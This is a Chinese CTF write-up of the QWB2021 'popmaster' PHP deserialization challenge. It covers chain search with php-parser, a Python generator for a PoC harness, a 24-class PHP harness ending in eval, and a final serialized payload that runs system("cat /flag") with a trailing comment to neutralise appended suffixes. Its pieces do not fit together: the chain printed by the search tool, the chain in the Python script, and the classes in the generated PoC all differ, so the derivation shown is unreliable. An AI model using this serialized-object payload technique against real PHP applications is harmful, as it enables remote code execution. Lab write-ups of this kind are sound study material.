[强网杯2021]XBUUCTF[QWB2021 Quals]popmaster复现记录

给自动化代码审计的大佬跪了。
出题人写的WP在这里:强网杯[pop_master]与[陀那多]赛题的出题记录
复现可以到BUUCTF,启动[QWB2021 Quals]popmaster这道题就ok。
按大佬的解法,首先要安装php-parser,把题目的代码转换成抽象语法树,实际上这道题就是一个图的可达路径搜索问题。
这里在kali安装一波php-parser:
1.wget https://getcomposer.org/installer
在这里插入图片描述
2.mv installer installer.php
3.php installer.php
在这里插入图片描述
出现这个提示,说明前置要求的composer.phar安装成功,当前目录下会多出一个名为composer.phar的文件
4.php composer.phar require nikic/php-parser
在这里插入图片描述
至此php-parser安装成功。
然后把大佬的EXP下下来,解压到当前目录中
然后将赛题中class.php的内容复制到本exp的code.php中。
然后在main.php的全局变量中填入入口方法与入口参数名
运行main.php:
在这里插入图片描述
成功找到一条pop链。

ZChdNQ======>dBIySo======>X0l7ws======>LyI1rT======>duxg5w======>D2VmWz======>w5pPNI======>x5cLyL======>Ga3P6G======>GVcxei======>Y4BK4w======>pYekV8======>hsrB5s======>kL7zby======>HbQCtF======>KXgmGS======>BVZEev======>Lutxdu======>TZMXmr======>xB56gm======>EfPQZq======>k1UgFG======>eval

写了一段python代码来生成php的poc:

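# -*- coding: utf-8 -*-
# Builds a local PHP harness for a pop chain reported by main.php: it cuts the
# class that defines each chain method out of class.php, instantiates one
# object per class and links each object's public property to the next object.
# Written for Python 2.7; it also runs on Python 3 (print is only ever called
# with a single argument and no py2-only syntax is used).
import re

# Challenge source the chain's classes are cut from.
classphp = "C:/Users/root/Desktop/class.php.txt"
# Chain exactly as printed by main.php: method names joined by "======>"; the
# last element is the sink (eval), not a method to look up.
pop = "bqoNH6======>U3GR5Y======>yZ135Z======>PEmYsT======>xTOweR======>kdYRCK======>p9g5V9======>z2B2Yy======>zyPbQC======>GUFeql======>ZUMG5r======>H9G1mh======>XePAh8======>fpPqVg======>YNBWxQ======>tE6Eu5======>UhnEew======>pP2Nyq======>a2w5hk======>EYafpg======>YlEyzo======>l94Kwx======>eval"
# How many lines above/below a method definition are searched for the
# enclosing `class ... {` header and for the next class header.
CLASS_SEARCH_WINDOW = 30

# Class header such as `class L7UHD6{`; captures the class name.
_CLASS_RE = re.compile(r"class\s+(\w+)")
# Declared public property such as `    public $nHWOwmq;`; captures its name.
_PROPERTY_RE = re.compile(r"public\s+\$(\w+)")


def _is_class_line(line):
    """Return True for a line that opens a class body (contains `class` and `{`)."""
    return "class" in line and "{" in line


def _first_class_line(lines, indexes):
    """Return the first index in `indexes` whose line opens a class, else None."""
    for k in indexes:
        if _is_class_line(lines[k]):
            return k
    return None


def _class_spans(lines, methods, window=CLASS_SEARCH_WINDOW):
    """Locate the class that defines each method of the chain.

    Args:
        lines: the PHP source as a list of lines (trailing newlines optional).
        methods: chain method names, in chain order, without the final sink.
        window: maximum distance in lines between a method definition and its
            class header (searched upwards) or the next class header (downwards).

    Returns:
        A list parallel to `methods`. Each entry is a `(start, end)` pair of
        0-based indexes such that `lines[start:end]` is the whole class, or
        None when no line both names the method and opens a block, or no
        class header precedes it within `window`. When no class header follows
        within `window`, `end` is `len(lines)` (the class runs to end of file).
        If a method name matches several definition lines, the last one wins.
    """
    spans = [None] * len(methods)
    last = len(lines)
    for lineno, line in enumerate(lines):
        # Method definitions are the lines that both name the method and open
        # a block; call sites such as `$this->x->name($v);` carry no `{`.
        if "{" not in line:
            continue
        for i, name in enumerate(methods):
            if name not in line:
                continue
            upwards = range(lineno, max(lineno - window, -1), -1)
            start = _first_class_line(lines, upwards)
            if start is None:
                continue  # no class header within the window: leave unresolved
            downwards = range(lineno + 1, min(lineno + window, last))
            end = _first_class_line(lines, downwards)
            spans[i] = (start, last if end is None else end)
    return spans


def generate_poc(lines, chain):
    """Return the lines of a PHP harness that wires up `chain`.

    Args:
        lines: the PHP source as a list of lines.
        chain: the pop chain as a list of method names; the last element is
            the sink and is not looked up.

    Returns:
        A list of strings without trailing newlines: `<?php`, the verbatim
        class definitions in chain order, one `$aN = new Class();` per class,
        then `$aN->prop=$aN+1;` for every public property of each class but
        the last. The last object's property is deliberately left unset: the
        sink's argument is the method parameter supplied by the caller, not a
        property, so there is no further object to link to.

    Raises:
        ValueError: when a chain method's class cannot be located, or its
            header does not name a class. A harness with a missing link is
            useless, so this is reported instead of emitting garbage.
    """
    methods = chain[:-1]
    spans = _class_spans(lines, methods)
    names = []
    for name, span in zip(methods, spans):
        if span is None:
            raise ValueError("class defining method %r not found" % name)
        header = _CLASS_RE.search(lines[span[0]])
        if header is None:
            raise ValueError("no class name on header line for method %r" % name)
        names.append(header.group(1))

    out = ["<?php"]
    # 1. The class definitions, copied verbatim in chain order.
    for start, end in spans:
        out.extend(line.rstrip("\r\n") for line in lines[start:end])
    # 2. One object per class, numbered by chain position.
    for i, class_name in enumerate(names):
        out.append("$a%d = new %s();" % (i, class_name))
    # 3. Link each object's public property/properties to the next object.
    for i, (start, end) in enumerate(spans[:-1]):
        for line in lines[start:end]:
            prop = _PROPERTY_RE.search(line)
            if prop:
                out.append("$a%d->%s=$a%d;" % (i, prop.group(1), i + 1))
    return out


def main():
    """Read class.php, build the harness for `pop` and print it to stdout."""
    with open(classphp) as src:
        lines = src.readlines()
    for line in generate_poc(lines, pop.split("======>")):
        print(line)


if __name__ == "__main__":
    main()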

得到poc:

<?php
// First object of the chain ($a0). xbepUT() appends 'wHmK0' to its argument
// (the 45016>39692 guard is always true) before forwarding it to
// $nHWOwmq->mAbmf6()/rcLD5G() when those methods exist; VTtOt1() forwards its
// argument unchanged to Vf56w8()/H71Z97() when present.
class L7UHD6{
    public $nHWOwmq;
    public function xbepUT($dV2ZO){
		if(45016>39692){
			$dV2ZO = $dV2ZO.'wHmK0';
		}
		if(method_exists($this->nHWOwmq, 'mAbmf6')) $this->nHWOwmq->mAbmf6($dV2ZO);
		if(method_exists($this->nHWOwmq, 'rcLD5G')) $this->nHWOwmq->rcLD5G($dV2ZO);

    }
    public function VTtOt1($gIpCX){
		for($i = 0; $i < 26; $i ++){
			$au0wPm= $gIpCX;
		}
		if(method_exists($this->nHWOwmq, 'Vf56w8')) $this->nHWOwmq->Vf56w8($gIpCX);
		if(method_exists($this->nHWOwmq, 'H71Z97')) $this->nHWOwmq->H71Z97($gIpCX);

    }
}


// C7F7Xa() overwrites its argument with 'LbsMN' before the eval, so caller
// input never reaches that sink; mAbmf6() forwards its argument unchanged to
// $LBhGiW0->BHGNSG() (the for loop only copies it).
class YyaVmX{
    public $LBhGiW0;
    public function C7F7Xa($aAsyu){
		$aAsyu='LbsMN';
		eval($aAsyu);

    }
    public function mAbmf6($PTDrM){
		for($i = 0; $i < 23; $i ++){
			$aFkirt= $PTDrM;
		}
		$this->LBhGiW0->BHGNSG($PTDrM);

    }
}


// BHGNSG() forwards its argument unchanged to $YV1W3IV->ITqWW2(); its
// 1366>45772 guard is always false, so no suffix is appended. yKpHBF()
// forwards to tumiOO()/gguM56() when present.
class FPlBKG{
    public $YV1W3IV;
    public function yKpHBF($VC23m){
		for($i = 0; $i < 7; $i ++){
			$agyI1z= $VC23m;
		}
		if(method_exists($this->YV1W3IV, 'tumiOO')) $this->YV1W3IV->tumiOO($VC23m);
		if(method_exists($this->YV1W3IV, 'gguM56')) $this->YV1W3IV->gguM56($VC23m);

    }
    public function BHGNSG($AGPDQ){
		if(1366>45772){
			$AGPDQ = $AGPDQ.'XupC5';
		}
		$this->YV1W3IV->ITqWW2($AGPDQ);

    }
}


// lGVgt2() overwrites its argument with the undefined $sFwFD before the eval,
// so caller input never reaches that sink; ITqWW2() sets the undeclared
// property UtURv and forwards its argument unchanged to $SuxNbbP->oMvqkv().
class kCZ5P4{
    public $SuxNbbP;
    public function lGVgt2($g7FMP){
		for($i = 0; $i < 3; $i ++){
			$g7FMP= $sFwFD;
		}
		eval($g7FMP);

    }
    public function ITqWW2($yukip){
		$this->UtURv = "X7Eg4";
		$this->SuxNbbP->oMvqkv($yukip);

    }
}


// GGs2Tx() passes its argument straight to eval(); oMvqkv() sets the
// undeclared property cM4xY and forwards its argument unchanged to
// $c8Un3Pc->msMgDb().
class fhGDEo{
    public $c8Un3Pc;
    public function GGs2Tx($waoG6){
		eval($waoG6);

    }
    public function oMvqkv($GeGy2){
		$this->cM4xY = "xIS1c";
		$this->c8Un3Pc->msMgDb($GeGy2);

    }
}


// msMgDb() sets the undeclared property rlETt and forwards its argument to
// $AanVLGe->hZChcd()/v05w7c() when present; dg8ecu() forwards it unchanged
// to CNnFdI().
class qZgqTN{
    public $AanVLGe;
    public function msMgDb($hiIFc){
		$this->rlETt = "PxSDM";
		if(method_exists($this->AanVLGe, 'hZChcd')) $this->AanVLGe->hZChcd($hiIFc);
		if(method_exists($this->AanVLGe, 'v05w7c')) $this->AanVLGe->v05w7c($hiIFc);

    }
    public function dg8ecu($vkPSz){
		for($i = 0; $i < 3; $i ++){
			$aZTyWy= $vkPSz;
		}
		$this->AanVLGe->CNnFdI($vkPSz);

    }
}


// hZChcd() sets the undeclared property QlrMr and forwards its argument to
// $xEGEy7K->x8iwgk()/wkd2WW() when present; WMtbwZ() sets N4yEy and evals
// its argument as-is.
class XyhYtb{
    public $xEGEy7K;
    public function hZChcd($S5KoL){
		$this->QlrMr = "UnRom";
		if(method_exists($this->xEGEy7K, 'x8iwgk')) $this->xEGEy7K->x8iwgk($S5KoL);
		if(method_exists($this->xEGEy7K, 'wkd2WW')) $this->xEGEy7K->wkd2WW($S5KoL);

    }
    public function WMtbwZ($ugsdY){
		$this->N4yEy = "UvvRN";
		eval($ugsdY);

    }
}


// x8iwgk() sets the undeclared property XnLoL and forwards its argument to
// $bz6H98l->PcquZZ()/sFGeyF() when present; FWq4lD() evals its argument as-is.
class suL25R{
    public $bz6H98l;
    public function x8iwgk($QrGk8){
		$this->XnLoL = "Xwudp";
		if(method_exists($this->bz6H98l, 'PcquZZ')) $this->bz6H98l->PcquZZ($QrGk8);
		if(method_exists($this->bz6H98l, 'sFGeyF')) $this->bz6H98l->sFGeyF($QrGk8);

    }
    public function FWq4lD($rqPwp){
		eval($rqPwp);

    }
}


// sFGeyF() forwards its argument unchanged to $FwX8fKY->ti9YlF() (the for
// loop only copies it); dm4bGP() forwards to akEghP()/bPN2Nx() when present
// (its loop runs zero times).
class DLGUGZ{
    public $FwX8fKY;
    public function sFGeyF($XzG6P){
		for($i = 0; $i < 22; $i ++){
			$aiuTZa= $XzG6P;
		}
		$this->FwX8fKY->ti9YlF($XzG6P);

    }
    public function dm4bGP($gqoRh){
		for($i = 0; $i < 0; $i ++){
			$aCumW9= $gqoRh;
		}
		if(method_exists($this->FwX8fKY, 'akEghP')) $this->FwX8fKY->akEghP($gqoRh);
		if(method_exists($this->FwX8fKY, 'bPN2Nx')) $this->FwX8fKY->bPN2Nx($gqoRh);

    }
}


// ti9YlF() forwards its argument unchanged to $sfVD9z1->tYwP6S()/kkWKI2()
// when present; EGyMsQ() evals its argument as-is.
class A5SQm0{
    public $sfVD9z1;
    public function ti9YlF($wV3Ig){
		for($i = 0; $i < 1; $i ++){
			$aCHhiQ= $wV3Ig;
		}
		if(method_exists($this->sfVD9z1, 'tYwP6S')) $this->sfVD9z1->tYwP6S($wV3Ig);
		if(method_exists($this->sfVD9z1, 'kkWKI2')) $this->sfVD9z1->kkWKI2($wV3Ig);

    }
    public function EGyMsQ($sOzws){
		eval($sOzws);

    }
}


// kkWKI2() sets the undeclared property bV86G and forwards its argument to
// $umxT6cV->RBXeSg()/i0URsO() when present; vdQxOo() overwrites its argument
// with the undefined $Sl9Kd before forwarding to VmSVuq()/GhFnwk().
class HXf222{
    public $umxT6cV;
    public function kkWKI2($DpQYt){
		$this->bV86G = "qW8tN";
		if(method_exists($this->umxT6cV, 'RBXeSg')) $this->umxT6cV->RBXeSg($DpQYt);
		if(method_exists($this->umxT6cV, 'i0URsO')) $this->umxT6cV->i0URsO($DpQYt);

    }
    public function vdQxOo($XY7aa){
		for($i = 0; $i < 21; $i ++){
			$XY7aa= $Sl9Kd;
		}
		if(method_exists($this->umxT6cV, 'VmSVuq')) $this->umxT6cV->VmSVuq($XY7aa);
		if(method_exists($this->umxT6cV, 'GhFnwk')) $this->umxT6cV->GhFnwk($XY7aa);

    }
}


// RBXeSg() sets the undeclared property H3vLG and forwards its argument to
// $TxB0FdF->zTkOnG()/G0ioTK() when present; oplEGY() sets ypak3 and forwards
// to mIrTr2()/EVAhi7() when present.
class gDnfK9{
    public $TxB0FdF;
    public function RBXeSg($bF4BC){
		$this->H3vLG = "v2w10";
		if(method_exists($this->TxB0FdF, 'zTkOnG')) $this->TxB0FdF->zTkOnG($bF4BC);
		if(method_exists($this->TxB0FdF, 'G0ioTK')) $this->TxB0FdF->G0ioTK($bF4BC);

    }
    public function oplEGY($QGyHC){
		$this->ypak3 = "HMUxr";
		if(method_exists($this->TxB0FdF, 'mIrTr2')) $this->TxB0FdF->mIrTr2($QGyHC);
		if(method_exists($this->TxB0FdF, 'EVAhi7')) $this->TxB0FdF->EVAhi7($QGyHC);

    }
}


// zTkOnG() sets the undeclared property qv4A9 and forwards its argument
// unchanged to $izw1YVT->ODsdNW(); l6fzen() sets iyZkT and forwards to
// dr6ybG().
class D8UAmt{
    public $izw1YVT;
    public function zTkOnG($vmaCD){
		$this->qv4A9 = "wW7ee";
		$this->izw1YVT->ODsdNW($vmaCD);

    }
    public function l6fzen($Iz4xl){
		$this->iyZkT = "BwaGt";
		$this->izw1YVT->dr6ybG($Iz4xl);

    }
}


// ODsdNW() forwards its argument unchanged to $iiirsPe->tYWHfI()/qtRRwg()
// when present; khXStd() forwards to gCBRhG()/K9YqDl() when present. Both
// for loops only copy the argument.
class D8WX2Q{
    public $iiirsPe;
    public function ODsdNW($Rrp6q){
		for($i = 0; $i < 26; $i ++){
			$aOWEiN= $Rrp6q;
		}
		if(method_exists($this->iiirsPe, 'tYWHfI')) $this->iiirsPe->tYWHfI($Rrp6q);
		if(method_exists($this->iiirsPe, 'qtRRwg')) $this->iiirsPe->qtRRwg($Rrp6q);

    }
    public function khXStd($xx5AI){
		for($i = 0; $i < 24; $i ++){
			$atgh0U= $xx5AI;
		}
		if(method_exists($this->iiirsPe, 'gCBRhG')) $this->iiirsPe->gCBRhG($xx5AI);
		if(method_exists($this->iiirsPe, 'K9YqDl')) $this->iiirsPe->K9YqDl($xx5AI);

    }
}


// tYWHfI() appends 'SGu6E' to its argument (52033>2482 is always true)
// before forwarding to $mUISnWb->x43ZTL()/dQMl9g() when present; yvGxsq()
// sets the undeclared property ZR23N and forwards to ssR1IV()/wFmoAx().
class EVAmyn{
    public $mUISnWb;
    public function yvGxsq($G9hkX){
		$this->ZR23N = "GvYES";
		if(method_exists($this->mUISnWb, 'ssR1IV')) $this->mUISnWb->ssR1IV($G9hkX);
		if(method_exists($this->mUISnWb, 'wFmoAx')) $this->mUISnWb->wFmoAx($G9hkX);

    }
    public function tYWHfI($yN6Eu){
		if(52033>2482){
			$yN6Eu = $yN6Eu.'SGu6E';
		}
		if(method_exists($this->mUISnWb, 'x43ZTL')) $this->mUISnWb->x43ZTL($yN6Eu);
		if(method_exists($this->mUISnWb, 'dQMl9g')) $this->mUISnWb->dQMl9g($yN6Eu);

    }
}


// x43ZTL() forwards its argument unchanged to $VLDgIsu->ebiPNb()/BGYfdR()
// when present; IP5InO() overwrites its argument with 'ui9fy' before the
// eval, so caller input never reaches that sink.
class cDuVyQ{
    public $VLDgIsu;
    public function x43ZTL($SHUc7){
		for($i = 0; $i < 30; $i ++){
			$asUMta= $SHUc7;
		}
		if(method_exists($this->VLDgIsu, 'ebiPNb')) $this->VLDgIsu->ebiPNb($SHUc7);
		if(method_exists($this->VLDgIsu, 'BGYfdR')) $this->VLDgIsu->BGYfdR($SHUc7);

    }
    public function IP5InO($OitLV){
		$OitLV='ui9fy';
		eval($OitLV);

    }
}


// ebiPNb() sets the undeclared property pzzE8 and forwards its argument
// unchanged to $ga4GK57->gSBlTm(); uUiXD0() forwards to sW3R98() (its
// 3909>32143 guard is always false, so no suffix is appended).
class vD3i0B{
    public $ga4GK57;
    public function uUiXD0($iuWYO){
		if(3909>32143){
			$iuWYO = $iuWYO.'FUVHe';
		}
		$this->ga4GK57->sW3R98($iuWYO);

    }
    public function ebiPNb($hwCNG){
		$this->pzzE8 = "Hlx2G";
		$this->ga4GK57->gSBlTm($hwCNG);

    }
}

// gSBlTm() sets the undeclared property SSi7T and forwards its argument to
// $ReDc2ZH->ayZmI3()/PdKLEU() when present; zpKlgI() sets FDN9G and forwards
// to tIYgva()/pH3TWQ() when present.
class N2Dy79{
    public $ReDc2ZH;
    public function gSBlTm($gFNi2){
		$this->SSi7T = "Tmb28";
		if(method_exists($this->ReDc2ZH, 'ayZmI3')) $this->ReDc2ZH->ayZmI3($gFNi2);
		if(method_exists($this->ReDc2ZH, 'PdKLEU')) $this->ReDc2ZH->PdKLEU($gFNi2);

    }
    public function zpKlgI($l9lUk){
		$this->FDN9G = "wqgFa";
		if(method_exists($this->ReDc2ZH, 'tIYgva')) $this->ReDc2ZH->tIYgva($l9lUk);
		if(method_exists($this->ReDc2ZH, 'pH3TWQ')) $this->ReDc2ZH->pH3TWQ($l9lUk);

    }
}


// ayZmI3() forwards its argument unchanged to $aaSROLe->UUqav0() (its
// 12818>22299 guard is always false); tYRTEy() forwards unchanged to
// BnYLZl().
class az2d5x{
    public $aaSROLe;
    public function ayZmI3($KVfRN){
		if(12818>22299){
			$KVfRN = $KVfRN.'xoTGc';
		}
		$this->aaSROLe->UUqav0($KVfRN);

    }
    public function tYRTEy($egmfS){
		for($i = 0; $i < 15; $i ++){
			$aQKoAF= $egmfS;
		}
		$this->aaSROLe->BnYLZl($egmfS);

    }
}


// UUqav0() appends 'RgmkC' to its argument (52050>20186 is always true)
// before forwarding to $wkvASs6->TbGxG5(); SxOyYw() sets the undeclared
// property KXDQF and evals its argument as-is.
class d0UxDv{
    public $wkvASs6;
    public function SxOyYw($EgxFz){
		$this->KXDQF = "WP7QA";
		eval($EgxFz);

    }
    public function UUqav0($s1mew){
		if(52050>20186){
			$s1mew = $s1mew.'RgmkC';
		}
		$this->wkvASs6->TbGxG5($s1mew);

    }
}
// TbGxG5() forwards its argument unchanged to $QIlLvkK->F5UkVr(); cLHWvn()
// appends 'cc1eG' (24817>22370 is always true) before forwarding to
// PiLK0i().
class HclckR{
    public $QIlLvkK;
    public function cLHWvn($eEipn){
		if(24817>22370){
			$eEipn = $eEipn.'cc1eG';
		}
		$this->QIlLvkK->PiLK0i($eEipn);
    }
    public function TbGxG5($YcxIx){
		for($i = 0; $i < 10; $i ++){
			$aTNhpa= $YcxIx;
		}
		$this->QIlLvkK->F5UkVr($YcxIx);
    }
}
// F5UkVr() forwards its argument unchanged to $xv9AHCl->htVHuV(); nOVnqx()
// sets the undeclared property gggqP and forwards to ACCxak().
class gp2b2g{
    public $xv9AHCl;
    public function nOVnqx($lgspc){
		$this->gggqP = "rMyHa";
		$this->xv9AHCl->ACCxak($lgspc);

    }
    public function F5UkVr($h9lGB){
		for($i = 0; $i < 36; $i ++){
			$aPITGf= $h9lGB;
		}
		$this->xv9AHCl->htVHuV($h9lGB);
    }
}
// htVHuV() appends 'QkEie' to its argument (63158>2952 is always true)
// before forwarding to $xt66alQ->C38qDA()/a0YLHW() when present; gwz5Lo()
// forwards unchanged to cH2bOt() (30529>49808 is always false).
class OOxBSs{
    public $xt66alQ;
    public function gwz5Lo($bhyKR){
		if(30529>49808){
			$bhyKR = $bhyKR.'hTHz9';
		}
		$this->xt66alQ->cH2bOt($bhyKR);
    }
    public function htVHuV($VpGQd){
		if(63158>2952){
			$VpGQd = $VpGQd.'QkEie';
		}
		if(method_exists($this->xt66alQ, 'C38qDA')) $this->xt66alQ->C38qDA($VpGQd);
		if(method_exists($this->xt66alQ, 'a0YLHW')) $this->xt66alQ->a0YLHW($VpGQd);

    }
}
// Last object of the chain ($a23). C38qDA() evals its argument (the
// 20950>43181 guard is always false, so nothing is appended here); LtGuap()
// evals as-is. $BWu6mc5 is read by neither method.
class OseZYk{
    public $BWu6mc5;
    public function LtGuap($qrXpU){
		eval($qrXpU);

    }
    public function C38qDA($xbly4){
		if(20950>43181){
			$xbly4 = $xbly4.'nEdmR';
		}
		eval($xbly4);
    }
}
// One object per chain class, numbered by chain position ($a0 is the entry
// class L7UHD6, $a23 the eval class OseZYk), then each object's single public
// property is pointed at the next object. $a23->BWu6mc5 is left unset.
$a0 = new L7UHD6();
$a1 = new YyaVmX();
$a2 = new FPlBKG();
$a3 = new kCZ5P4();
$a4 = new fhGDEo();
$a5 = new qZgqTN();
$a6 = new XyhYtb();
$a7 = new suL25R();
$a8 = new DLGUGZ();
$a9 = new A5SQm0();
$a10 = new HXf222();
$a11 = new gDnfK9();
$a12 = new D8UAmt();
$a13 = new D8WX2Q();
$a14 = new EVAmyn();
$a15 = new cDuVyQ();
$a16 = new vD3i0B();
$a17 = new N2Dy79();
$a18 = new az2d5x();
$a19 = new d0UxDv();
$a20 = new HclckR();
$a21 = new gp2b2g();
$a22 = new OOxBSs();
$a23 = new OseZYk();
$a0->nHWOwmq=$a1;
$a1->LBhGiW0=$a2;
$a2->YV1W3IV=$a3;
$a3->SuxNbbP=$a4;
$a4->c8Un3Pc=$a5;
$a5->AanVLGe=$a6;
$a6->xEGEy7K=$a7;
$a7->bz6H98l=$a8;
$a8->FwX8fKY=$a9;
$a9->sfVD9z1=$a10;
$a10->umxT6cV=$a11;
$a11->TxB0FdF=$a12;
$a12->izw1YVT=$a13;
$a13->iiirsPe=$a14;
$a14->mUISnWb=$a15;
$a15->VLDgIsu=$a16;
$a16->ga4GK57=$a17;
$a17->ReDc2ZH=$a18;
$a18->aaSROLe=$a19;
$a19->wkvASs6=$a20;
$a20->QIlLvkK=$a21;
$a21->xv9AHCl=$a22;
$a22->xt66alQ=$a23;

然而根据该poc生成的EXP报错了:
在这里插入图片描述
在本地调试之后发现,原因是链中的一些类在永真条件下给传入eval的参数追加了后缀,导致eval执行失败:
在这里插入图片描述
所以这里尝试在参数末尾加一个注释符//,把追加的后缀注释掉:
最终EXP:

?pop=O%3A6%3A%22L7UHD6%22%3A1%3A%7Bs%3A7%3A%22nHWOwmq%22%3BO%3A6%3A%22YyaVmX%22%3A1%3A%7Bs%3A7%3A%22LBhGiW0%22%3BO%3A6%3A%22FPlBKG%22%3A1%3A%7Bs%3A7%3A%22YV1W3IV%22%3BO%3A6%3A%22kCZ5P4%22%3A1%3A%7Bs%3A7%3A%22SuxNbbP%22%3BO%3A6%3A%22fhGDEo%22%3A1%3A%7Bs%3A7%3A%22c8Un3Pc%22%3BO%3A6%3A%22qZgqTN%22%3A1%3A%7Bs%3A7%3A%22AanVLGe%22%3BO%3A6%3A%22XyhYtb%22%3A1%3A%7Bs%3A7%3A%22xEGEy7K%22%3BO%3A6%3A%22suL25R%22%3A1%3A%7Bs%3A7%3A%22bz6H98l%22%3BO%3A6%3A%22DLGUGZ%22%3A1%3A%7Bs%3A7%3A%22FwX8fKY%22%3BO%3A6%3A%22A5SQm0%22%3A1%3A%7Bs%3A7%3A%22sfVD9z1%22%3BO%3A6%3A%22HXf222%22%3A1%3A%7Bs%3A7%3A%22umxT6cV%22%3BO%3A6%3A%22gDnfK9%22%3A1%3A%7Bs%3A7%3A%22TxB0FdF%22%3BO%3A6%3A%22D8UAmt%22%3A1%3A%7Bs%3A7%3A%22izw1YVT%22%3BO%3A6%3A%22D8WX2Q%22%3A1%3A%7Bs%3A7%3A%22iiirsPe%22%3BO%3A6%3A%22EVAmyn%22%3A1%3A%7Bs%3A7%3A%22mUISnWb%22%3BO%3A6%3A%22cDuVyQ%22%3A1%3A%7Bs%3A7%3A%22VLDgIsu%22%3BO%3A6%3A%22vD3i0B%22%3A1%3A%7Bs%3A7%3A%22ga4GK57%22%3BO%3A6%3A%22N2Dy79%22%3A1%3A%7Bs%3A7%3A%22ReDc2ZH%22%3BO%3A6%3A%22az2d5x%22%3A1%3A%7Bs%3A7%3A%22aaSROLe%22%3BO%3A6%3A%22d0UxDv%22%3A1%3A%7Bs%3A7%3A%22wkvASs6%22%3BO%3A6%3A%22HclckR%22%3A1%3A%7Bs%3A7%3A%22QIlLvkK%22%3BO%3A6%3A%22gp2b2g%22%3A1%3A%7Bs%3A7%3A%22xv9AHCl%22%3BO%3A6%3A%22OOxBSs%22%3A1%3A%7Bs%3A7%3A%22xt66alQ%22%3BO%3A6%3A%22OseZYk%22%3A1%3A%7Bs%3A7%3A%22BWu6mc5%22%3BN%3B%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D&argv=system("cat /flag");//

拿到flag:
在这里插入图片描述
